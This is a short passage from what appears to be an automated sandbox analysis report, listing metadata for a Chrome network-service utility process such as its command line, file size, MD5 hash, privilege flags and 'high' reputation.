                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2024,i,11557377144956584876,17770760742759118039,262144 /prefetch:8
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      No disassembly